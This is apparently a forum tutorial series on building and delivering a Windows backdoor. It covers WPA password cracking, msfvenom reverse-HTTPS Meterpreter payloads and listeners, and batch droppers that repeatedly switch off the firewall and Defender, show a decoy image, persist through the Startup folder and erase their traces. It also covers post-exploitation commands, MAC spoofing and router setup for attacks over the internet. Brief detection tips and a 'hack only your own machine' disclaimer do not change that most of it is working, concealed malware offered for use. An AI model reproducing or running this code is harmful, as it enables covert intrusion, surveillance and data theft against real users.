2. crunch 10 10 -t ,nterne@%% abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng -w - 'DragRouter'sCapturedfilehere' -e ROUTERESSID = Crunch will now generate all possible combinations of what the password could be with what you gave it to work with, wait for the key to be found and you're done.

METHOD 2 WORDLIST: Use if you don't know any of the password, but you wish to try many pre-prepared possibilities.

1. aircrack-ng -w 'INSERTWORDLISTHERE.txt' -b RoutersBSSID 'DRAGROUTERCAPTUREDFILEHERE' = Now it will try every word in your word list, and compare it to what the password captured in the captured file. Whenever it finds a match, it will reveal whic word in your wordlist matches with the Router's Password.

20. Gain Wpa Wifi Access


In the video I show a quick overview of the Autoit program and what it takes to write an autoit script if you have a perfect duplicated resolution sized version of windows as your Target's Pc.

thef.exe script Contents, that was used in the Windows 7 Hacking Demo.

I pressed "Print Screen" button on keyboard to copy a screenshot of the screen to the invisible clipboard in windows, "Ctrl+V" to paste the screenshot in the Paint Window.

In Ms Paint, I used "Ctrl+E" to resize the pixels to 02 by 02 at 4:38 of the video.

and you can see the code below that I used for the Auto-it Script.


AutoItSetOption('MouseCoordMode', 0)

send ("! ")


send("{down down}")


send("{down up}")


send("{down down}")


send("{down up}")


send("{down down}")


send("{down up}")


send("{down down}")


send("{down up}")


send("{down down}")


send("{down up}")


Send("{Enter down}")


Send("{Enter up}")


MouseClick('primary',1008,48, 1,50)


MouseClick('primary',825,407, 1,50)


MouseClick('primary',31,120, 1,50)


MouseClick('primary',89,385, 1,50)


MouseClick('primary',135,464, 1,50)


MouseClick('primary',308,288, 1,50)


MouseClick('primary',763,553, 1,50)


MouseClick('primary',1017,716, 9,50)


MouseClick('primary',762,252, 1,50)


MouseClick('primary',762,301, 1,50)


MouseClick('primary',762,351, 1,50)


MouseClick('primary',762,399, 1,50)


MouseClick('primary',762,447, 1,50)


MouseClick('primary',762,496, 1,50)


MouseClick('primary',762,546, 1,50)


MouseClick('primary',762,594, 1,50)


MouseClick('primary',762,644, 1,50)


MouseClick('primary',762,693, 1,50)



21. Autoit v3 Script Danger with Windows 7

*N300 Wifi Router with the grooves in the Wifi Router was the one I used in this video, if you want your 2ndary Router Setup to look exactly as mine did within the video, I suggest using the same router, because some router's don't support Port Forwarding as easily as this one does. I spent around $20 to purchase this Router from Ebay. It's very cheap when compared to some Routers.*

Lan, Local Area Network Payload

1. ifconfig = visit your router's page, you will find most of the address under the inet section of your interface, except for the last group of numbers. for example 198.168.220.X

2. Forward the ports as "tcp" through the 2nd or both of your routers. This test can be done offline, if you connect your computers to the 2nd router, and do not connect the 2nd router to the Internet.

3. This test can be done onine using both of your routers if you connect your 2nd router to your first router.  In order to do this, you must port forward from first router to the 2nd router, then from the 2nd router to your Linux Pc.

4. Port forward from the 1st Router to 2nd router.

5. Port Forward to the Linux Pc from the 2nd Router. Once you get all the necessary ports forwarded as is done in the video you can proceed with the steps of creating a raw payload file below.

1. msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=0000 -f psh-cmd -o ~/Desktop/f/lfile.bat = creates a payload with the lowercase "-p" sets the local ip of your linux machine in the LHOST, the port you have forwarded to it with LPORT, saves as a raw payload filetype of Powershell-command prompt saves file to your Linux Desktop's f folder that must be pre-created before creating the payload using mkdir command or by right clicking on your Desktop and selecting create new folder, then naming it "f".

2. copy the raw payload to your Usb Stick, then unmount it from linux so it will be usable with Windows.

3. create a folder on your Desktop called, "rc", then navigate to it.

4. nano file.rc = opens the nano editor with a potentially new file.rc file.

file.rc should contain the following script.


use exploit/multi/handler

set payload windows/meterpreter/reverse_https


set LPORT 0000

set ReverseListenerBindAddress

set ExitOnSessions false

exploit -j -z


"Ctrl+Shift+T" open a new terminal tab.

5. msfconsole = start metasploit, if it fails be persistent until it starts.

6. use exploit/multi/handler = set the multi handler, You may see a different banner than I do, don't worry about it.

7. set payload windows/meterpreter/reverse_https = set the Payload to for the listener to listen for a connection on.

8. options = see what are the required options for this specific payload.

9. set LHOST = This should be our Local Linux Pc's Ip Address that can be obtained by looking at the interface you are connected to using "ifconfig" and looking for the ip address.

10. set LPORT 0000 = set the port that you forwarded through your router, or routers.

11. set ReverseListenerBindAddress = this also is your Local Ip Address of your Linux Pc, that can be obtained with "ifconfig" as mentioned earlier.

12. set ExitOnSessions false

13. exploit -j -z = tells msfconsole to connect to new connections, then place them in the "background" leaving it connected until you're ready to proceed, still while looking for other connections that may happen (if you are listening for multiple pc connections for example, or want to look at a connection to make sure it's the right one before connecting to it.

Extra information that's not really relevent.

1. msfvenom -? = brings the msfvenom help page up.

2. msfvenom -l >> ~/Desktop/Payloadoptions = brings up msfvenom payload list and saves it to a file called Payload options on your Desktop. (may need to enter this command several times until it successfully brings back the Payload list.)

3. You can open PayloadOptions file, and search for windows/meterpreter/reverse = to find the payload that we are using, and read about it slightly as I did in the video.

4. msfvenom --help-formats = views the possible output formats for msfvenom, we used psh-cmd but there are several other possible formats that can be used with different Payloads, you'll have to seek them out online and read about them to learn more, Some Payloads may be too large for our psh-cmd format, the reason I am showing you this extra info is to help you gain a better understanding of how it all works.

22. Lan Pentest, Preparing Router, Payload, and Listener.

Lan & Wlan Pentests, A Closer look at preparing the Payloads, 3 Bat Files Commands are explained within this video.

af.bat Contents & Rem comments Explaination of Commands.


@echo off
Rem Turns off Echo
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
Rem starts command prompt in minimized mode,
Rem this command probably isn't necessary,
Rem since we will make the entire thing invisible later
Rem but why not?
taskkill /im f1.exe /f
Rem kill process f1.exe forcefully.
timeout /t 01 > nul
Rem waits 1 second, without printing anything with nul.
start "" "%appdata%\zombie.png"
Rem starts a program or file, in this case a picture.
netsh advfirewall set allprofiles state off 2> nul
Rem sets Windows 10 firewall to off if this
Rem Program is ran in Administrator Mode.
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
Rem Disable Window's Defender Realtime Protection
timeout /t 10 > nul
Rem waits 10 seconds, repeat.
Rem If the program is not ran as administrator
Rem This portion will just print an error, but
Rem since it's set to Nul, it shouldn't print anything.
Rem Besides, we will make this entire thing invisible
Rem so nothing seems to matters, it's just extra notes.
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
Rem After approximately 1 minute and 40 seconds of
Rem Repeatedly disabling protection
"%appdata%\f1.exe" 2> nul
Rem Starts "f1.exe" silently from within this actual
Rem Command Prompt Window.
Rem there is no start command before it,
Rem so this program is done running from this point
Rem and it should not be able to run any commands below
Rem this point.
Rem just incase it did run anything else,
Rem it will exit itself.


f1.bat Contents & Rem comments Explanation of Commands.


@echo off
taskkill /im powershell.exe /f 2> nul
Rem turns echo off, kills payload's
Rem process, powershell.exe if it's running.
timeout /t 02
Rem waits 2 seconds
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
Rem Moves f.exe to the User's startup's folder.
Rem Beginning Block
set t=%date:~4,5%
Rem Set's the variable "t" to the current date of the pc
if "%t%"=="03/02" goto :A
Rem if the date matches 3 month and 2 day goto block A.
if not "%t%"=="03/02" goto :B
Rem if doesn't match 3 month and 2 day goto block B.
timeout /t 02 > nul
Rem Waits 2 seconds
Rem Beginning of Block A.
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
Rem start Payload.
Rem Beginning of Block B.
timeout /t 05
Rem Waits 5 seconds.
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
Rem starts f.exe
timeout /t 05
Rem Waits 5 seconds, program will exit itself after
Rem Completing all commands.

[color=#000000][size=16][b][color=#0000FF]f.bat[/color] Contents & Rem comments Explaination of Commands.
[color=#000000][size=16][b]Rem Turns echo off.
taskkill /im f1.exe /f 2> nul
Rem kills the process f1.exe forcefully, to nul
Rem so it doesn't print anything when it kills it.
taskkill /im powershell.exe /f
Rem kills powershell.exe forcefully.
timeout /t 04 > nul
Rem waits 4 seconds.
del "%appdata%\f1.exe" /q /s /f 2> nul
Rem deletes f1.exe which is the payload .exe


I prefer to use Windows 7 vs. Windows 10 to prepare the Payload.

1. Search windows for Microsoft Security Essentials (That's my Virus Protector within the video.) Set your real-time protection to Off.

2. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = Open the Command Prompt, enter the follwing command which will kill your gui explorer, kill Microsoft security essentials process, then restart your gui file explorer.

3. Plug in your Usb stick with the Payload on it.

4. I have the 3 .bat files code contents in this forum post, under the "code" sections, find the 3 .bat files I use in the video, then follow the instructions within the video carefully. Below are each of the .bat file contents, and the names I named it within the video.

5. You will need your own payload, your own icon file, and your own zombie.PNG image in order to use the below files for a Pentest on your own machine.

6. Keep in mind for the exe files that I created, the 1 exe that runs for administrator is for Windows 10, and the one that runs without administrator priviledges is for Windows 7.

af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work however for 32-bit windows 7 systems.


@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul


f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.


@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05


f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.


@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul


Bat to Exe Converter Download Link

Big J Icon Maker Download Link copy & Paste in your browser above Also it should be noted that any Icon Maker should work, you don't have to use this one.

23. Lan Pentest Preparing Payload With Windows 7

Note: I skipped the first 2 or 3 minutes of the video so that everything would be viewable instantly and you wouldn't have to watch an idle 3 minutes of nothing happening.

1. When the user double left clicks on the Payload that was previously created, the payload sends a signal to our machine running Linux, which our Linux System is then able to enter through a backdoor into the Windows 7 system.

2. sessions -i = is typed in the Linux machine to check for active connections, one is found, but the information fails to display so we wait a few seconds and perform the command again.

3. sessions -i = is entered again, we see ID is "2" a connection has been made with a Windows pc with an ip of through their out-going port 50393, their information displays the name of the user who clicked on the file, also the Pc's name,

it connects with the Linux Pc which has an ip address of through the open port 1625 which was previously forwarded.

4. sessions -i 2 = causes Linux's meterpreter session to connect to the session.

5. pwd = is entered to find out where the Linux pc meterpreter session is located on the Windows 7 Pc.

4. idletime = is entered to find out how long the Windows 7 user has been idle for. (idle means not moving mouse or pressing keys, no activity basically.)

5. cd .. = Goes back a directory, You can navigate using the meterpreter session, but I would recommend navigating directory, by directory, instead of trying to jump from 1 big path to another.

6. cd .. = Goes back a directory

7. dir = lists the current home directory of the User, the user's Desktop is visible from here.

8. cd Desktop = navigates to the User's Desktop.

9. ls = with the Meterpreter, you can also list items as you would in linux, or you can use the "dir" as you would with Windows Command Prompt.

One the Desktop, I notice there's a Google Chrome.lnk short-cut link that can be accessed using the shell.

In another terminal tab, I locate an auto-it script that I previously created before the video.

10. upload '//root//Desktop//a//thef.exe' "C:\\Users\\user\\Desktop\\thef.exe" = we upload thef.exe from our usb drive's Desktop, to the Windows 7 Pc using the Meterpreter session. Notice how we enclosed the Linux Path with 'these' and the Windows path with "these" that is very important, otherwise it would not work with paths that include spaces in the directories/folders/files names Also Double Slashes is necessary when uploading or downloading files using the Meterpreter.

11. dir = to view the file that we just uploaded.

Remember earlier, how we seen the "Google Chrome.lnk" on the user's Desktop?

12. shell = which changes the meterpreter session into the User's actual command prompt, it's now as if we are sitting infront of the Windows 7 computer using their keyboard.

13. "Google Chrome.lnk" & timeout /t 12 & thef.exe = Starts Chrome from the short-cut in the present working directory, waits 12 seconds, (just incase their pc is slow), starts our auto-it script thef.exe that we uploaded.

Even tho our linux terminal gives out an error, it doesn't matter, because it still worked regardless.

14. exit = type exit one time, and just wait for the command prompt to change into the Meterpreter Session again.

The Meterpreter Session will return once the Autoit script has finished running.

15. screenshot = typing screenshot from meterpreter session will save a screenshot of the user's screen to the same folder that we previously started the msfconsole from our rc folder.

It will also display a path to where you can find the screenshot after it saves.

16. Using the gui "graphical interface" interface, we navigate and point & click to the rc folder, find the screenshot file that saved, preview it in Linux.

17. shell = We enter the user's command prompt shell again.

18. tasklist = lists the running processes of the Windows User.

"Ctrl+Shift+F" will allow you to search for text within the Linux Terminal.

19. Chrome.exe = type chrome, or chrome.exe to find the chrome image name process, once you find it kill it by using the next comment.

20. taskkill /im chrome.exe /f = kills the Chrome Browser Process. (Note: the next time the browser opens, it will try to restore the previous session, keep this in mind, and re-open the process, kill it again if you don't want this to happen, I personally do not care.)

21. exit = this time take notice how it exits the shell and goes back to the Meterpreter much quicker since we do not have an auto-it script running.

22. screenshot = takes another screenshot which will be saved in the same place as it did earlier.

Shell is like being infront of their machine executing commands, meterpreter gives the options of uploading, downloading files, and taking screenshots of the user's pc remotely, also as we'll get into later, viewing their webcam if they have an active one installed.

23. idletime = I check the idletime of the machine again, notice how it's not much different than last time? It's because we ran the auto-it script, and that moved the user's mouse, it only started counting the idletime after the user's mouse quit moving again.

24. dir = Lists the present working directory files again.

25. cd sendout = Navigates to "sendout" folder on the user's Desktop.

26. dir = lists the files of sendout folder.

27. download videoerror.PNG = Downloads a *.PNG file called, "videoerror.PNG" It saves in the same location as our screenshot files saved to earlier.

     When you are ready to close the meterpreter session you can type, "background" if you plan to connect back to it or "exit" if you do not plan to connect to it again, and wish to close the meterpreter session.

28. sessions -i = You can look at the active, and backgrounded sessions.

29. sessions -k 1 = You can type sessions -k and an Id number to kill a meterpreter session that you have open from the msf exploit handler.

30. sessions -i = shows no active sessions once you have killed or exited all open sessions, you are no longer connected to any meterpreter sessions.

24. Lan Pentest Windows 7 Hack Combined Screens Windows 7 & Linux

How to tell if you're Hacked in Windows 7?

1. User clicks on the payload, it allows a hacker to hack into their Pc through a Backdoor.

1. For Victims of Hacking, Right click on the task-bar, open the task manager.

2. Click on the performance tab.

3. Click on Resource Monitor...

4. Under Network Activity, you can see any network connection that is being made.

5. You can close out every other program that requires the Internet, and see what is left.

     Some system processes may occasionally reach out to the world through the network, but if you have a persistent process that keeps having network activity for no known reason, you are likely hacked.

6. netstat /nao = in the Command Prompt Look for established network connections, these are current connections that are happening as we speak.

It also has a matching PID number as what we've seen in the Resource Monitor.

7. To kill it, you could just open the task manager, right click on the powershell, and left click go to process, then to end Right click on powershell.exe and left click "End Process Tree Now".

8. tasklist = To kill it from command prompt, first find it with tasklist, you can also match the PID number, to the process in your Resource Monitor if you'd like to make sure it's the one that's using your Internet.

9. taskkill /im powershell.exe /f = You can kill it by the image name or the PID, if you kill it by the PID you would enter, "taskkill /pid 3004 /f" (with the number being the PID Number.)

10. Now in Linux, they have been disconnected, unless the payload has been set to re-connect after a certain amount of time.

11. You can trace the IP to the Internet Service Provider from this link.

    You could likely get an abuse link email from that, or contact the Internet Company that's associated with that IP, they would have the authority to track down who was using that Ip.

25. Lan Pentest Am I Hacked combined screens with Linux & Windows 7

How to tell if you're hacked in Windows 10? Story Time:

1. User starts the Payload file, it opens up the amazingly good looking zombie pic, and starts the payload within the first 2-3 minutes.

2. A Meterpreter session has happened with the Hacker successfully hacking into the system, after the protection has been disabled. The Hacker silently navigates around the system freely.

3. netstat /nao = The Windows user decides to check their computer's outgoing established connections. Windows 10 has a few established connections by default, because it's constantly updating etc..

The User notices an extra one however and decides to investigate. It shows the Ip address, and the port number, and the PID number.

5. The user decides to open the task manager, and selects "more details" to view all running processes. Windows 10 has several running by default, but the user sees that a Powershell session has been opened, and decides to cross-check the PID number with the one found by the netstat /nao established connection, it's a match.

6. The User left clicks on the Performance tab within the Task Manager, and checks the Resource Monitor for outgoing network connections.

7. The User has found the matching PID number was a match with the unknown Powershell session.

8. The User decides they could be hacked, so disconnects the Hacker from the computer by killing the Powershell by either image name or pid.

9. taskkill /pid 5040 /f = User decides to go with the PID number this time for demonstration purposes because in Windows 7: Am I Hacked? we chose to do it by Image Name.

Windows 10 echoes an error back to use, because we tried it from a Command Prompt that did not have Administrative Priviledges.

10. User right clicks the start menu, left clicks, "Run as Administrater" to run Command Prompt as Admin, then tried the taskkill command again.

11. taskkill /pid 5040 /f = The command has been successful this time, disconnecting the Connection from the Powershell back door connection of the Computer.

12. The Hacker can no longer access the user's pc, unless he had the .bat file set up to call for a future powershell connection, after the first initial connection.

The User may do some research and report the Attacker's Ip Address if he wishes by visiting

and finding the Attacker's Ip, then reporting them to their Internet Service Provider.

26. Lan Pentest Am I Hacked combined screens with Linux & Windows 10

*I do not Condone Hacking into other People's Pcs, so please only use this tutorial to "hack" your own machine.*


wlan, Wide Local Area Network Payload creation

PHASE 1 Spoofing the Linux Identity, setting up the routers, creating the Payload, starting the Listener.

1. service network-manager stop = Stops the network interfaces in the Linux Machine, and makes them changeable.

2. nano /etc/hosts = change the Hostname

3. nano /etc/hostname = change the Hostname

4. macchanger -r eth0 = assigns our wired connection eth0 interface a random mac address. Open mlist, choose a manufacturer to spoof the mac address with.

5. macchanger -m 00:00:00:00:00:00 eth0 = choose a manufacturer with the first 6 digits, and use the random mac address for the last 6 digits.

6. macchanger -m 00:00:00:00:00:00 lo = spoof lo interface using the same chosen mac address spoof.

7. macchanger -m 00:00:00:00:00:00 wlan0 = spoof wlan0 interface if it exists, using the same chosen mac address spoof.

8. service network-manager start = starts the network-manager again, if wlan0 did exist, and we were using wifi we would have to bring it down with ifconfig wlan0 and change it again, because the wireless interfaces likes being a little more difficult than the wired connections.

9. macchanger -s eth0 = shows the eth0 interface mac address.

10. macchanger -s lo = shows the lo interface mac address.

11. ifconfig = views all of the internet interfaces that's up.

12. copy your inet address, which is the local ip of the linux machine.

13. Change the last digit to 1, to access the 2ndary Trendnet Router Page. (unless you have altered your dhcp settings previously, if you have, then you must remember what you've set it to, 2 maybe?

14. login to router page, go to advanced, DMZ, place the local ip to your Linux Machine as the DMZ.

Now, go to status, "ip address" is the 2ndary router's ip that the 1st router assigned it, take note of that.

go to Gateway, to get to the 1st Router Page by using the gateway ip, under Port Triggering of the 1st router page, you'll want to Port Trigger "443" to your 1st Router's Public Ip.

and Port Forward Port "443" to the Virtual Server through 1st router to your 2nd router's Ip Address, which is the Ip Address that your first router assigned your 2ndary Trendnet Router.

Copy the "Public Ip" of the 1st Router, you'll need it to create the Payload.

15. service network-manager stop = After you make changes to the Router page, shut down and open back up your interfaces.

16. service network-manager start = of course if you were using wireless internet, you'd have to do the ifconfig wlan0 down again and re-change your wireless as well.

This is the equivalant to ipconfig /release, ipconfig /renew in a Windows Pc.

17. ping = You can ping duckduckgo to see if you're online again, then do another macchanger -s on all of your up interfaces to check to see if the mac address is still spoofed or not.

18. msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f psh-cmd -o ~/Desktop/f/thefile.bat = set the LHOST to the Public Ip of your first Router, set LPORT to 443, 443 is a default protocol used by machines to access their browsers, look up stuff, it's very commonly opened.

19. Plug in usb stick, copy thefile.bat the payload file to the USB stick, then unmount the Usb stick so that it will run okay on Windows 7 and not be currupted when we bring it there.

20. cd ~/Desktop/rc = Navigate to the pre-created rc Desktop folder,

Below is the script of file.rc


use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443
set ReverseListenerBindAddress
set ExitonSessions false
exploit -j -z


1st line, chooses a handler to use.

2nd line, sets the Payload to use.

3rd line, LHOST The Public Ip of the 1st Router should go here.

4rth line, LPORT The Port 443 should go here.

5th line, The Local Ip of your Linux Machine should go here, it will call your local machine after the connection is made by the Public Ip.

6th line, sets the ExitonSessions to false.

7th line, tells msfconsole to connect to new connections, then place them in the "background"

leaving it connected until you're ready to proceed,

still while looking for other connections that may happen

(if you are listening for multiple pc connections for example,

or want to look at a connection to make sure

it's the right one before connecting to it and navigating.)

21. msfconsole -r file.rc = During our Lan (local area network) Pentest earlier, we typed msfconsole then entered the commands manually for a learning experience, we could've just created a rc file. Now that you know your way around a bit. You can use the -r and just run msfconsole from your file.rc to automate the setup of the listener.

22. Notice how when the listener has been started, it says,

started HTTPS reverse handler on (if is the ip of your local machine.)

That means it's connected to your local linux ip address, using the port 443.

23. = Type Public Ip of 1st Router, and check to see if Port 443 is open or not.

If the Port says open, it's ready to make the connection, The Target Pc just needs to click the payload to call the Linux Pc that's listening for it.

PHASE TWO: Transferring Payload to fi.bat test file

24. On a Windows 7 Pc search windows for Microsoft, go into settings, turn off real-time protection.

25. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = kills the explorer.exe process, which is windows file explorer, kills the virus scanner process, brings the explorer back up.

26. After it's dead, plug in the usb stick right click on the fi file edit with notepad.exe (make sure wordwrap is off as we did while editing .bat files in the previous tutorials, highlight the insert here portion that is inside of the (') punctuations.

Copy and paste the Payload Powershell command into the Insert here portion of the file.

Contents of fi.bat file


@echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul


27. If you are curious why I decide to alter the file, in 2016 the file was generated differently, and with a more concealed command, this method is a lot better for staying hidden.

The same method is also used in the 3 bat files that were used earlier in the LAN Pentest.

28. Now double clicking the "fi.bat" and going back to the Linux Pc for a test to see if it works or not.

29. Sometimes the port 443 closes by itself on the public ip address, if this happens you can perform the following,

30. service network-manager stop = brings down your interfaces

31. service network-manager start = starts the interfaces again, of course keep in mind that if you're using wifi you'll need to perform the extra "ifconfig wlan0 down" step to change the wireless mac address because the wireless is more difficult to change.

32. ping = checks to see if you're online.

33. macchanger -s eth0 = checks wired connection mac address

34. macchanger -s lo = checks the lo interface mac address

35. if it's still closed, visit your 1st and 2nd router page again, double check the ports. Sometimes the routers randomly closes your ports for a couple of seconds or minutes, or maybe the ports just get busy and the connection isn't able to be made right then.

36. Now the public ip port shows as open with so it will accept connections and transfer them to the Linux Local Ip Address.

37. In the listener handler that was left open, it now made the connection.

38. sessions -i = may be required to view if there are any active connections in the Listener.

39. sessions -i 1 = sessions -i followed by an ID number will connect to the session, always make sure to view the information of the connection before you connect to it,

     You'll want to make sure that it's your pc that is trying to connect to your listener before you connect to it. If it fails to load information, just wait a few seconds and try "sessions -i" again.

     We certainly wouldn't want to "hack" someone else or a spider security robot that is going around the web looking for connections that will connect to it. Since that would be Illegal.

Now You have a successful Meterpreter session.

40. pwd = shows the user you're connected to present working directory from where your powershell connection has been established, in this case the file was clicked from the user's desktop so it's showing that as the present working directory.

41. help = another thing that should be noted is that after you have made a successful interaction with a computer you can type help to view the meterpreter help page, which is filled with useful information to use with the Meterpreter.

42. background = backgrounds a Meterpreter session, and leaves the option to reconnect to it open.

The Test was successful.

27. Wlan Payload Creation, Router Settings, Open Listener, & Hacking Test

Payload Concealment Info:

1. Create icon with Big J's Icon Maker, you could use any Icon Maker for this.

2. Edit the F1 file first putting the Payload in the "INSERT-HERE" from the original payload file or the fi file we edited earlier, inside of the ('INSERT-HERE') enclosed punctuations. Under the A: Block of text.

3. Create a new folder around the bat files named "e" to put our exe files that we create using BattoExe program that we learned about in our previous Lan Pentesting Videos.

4. Choose f.bat to convert into an invisible 64 bit exe first make sure %appdata% is set as working directory.

5. Then choose f1.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, and overwrite is set, and extract embeded items to %appdata% as well, include the f.exe file that we just created.

6. then choose af.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, choose icon for the file, choose %appdata% for embeded items, and make sure overwrite is set to yes. We will choose to embed, "zombie.PNG" and "f1.exe" (f1.exe also has f.exe embeded within it which we did previously.) so there is no need to include the f.exe

7. The payload here is created for a Windows 7 Pc, if it were to be created for a Windows 10 Pc, we would require administrative priveledges as we did with the Lan Pentesting video earlier, so that it could disable W10 Protection.

8. the "File.exe" is what the Target Pc will click to initiate the connection between the user and the Linux user.

9. Once it's double-clicked, it will open the Very visually pleasing zombie.PNG image for the user, and run the f1.exe file in the background.

10. the f.exe file will remain silent until the user restarts their pc, then it will remove f1.exe from the target's %appdata% folder.

The video has been sped up at this point, at this point in the video, it navigates to the folder where the files were extracted to show you how everything works.

Contents of fi.bat file


@echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul


af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work for 32-bit windows 7 systems.


@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul


f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.


@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
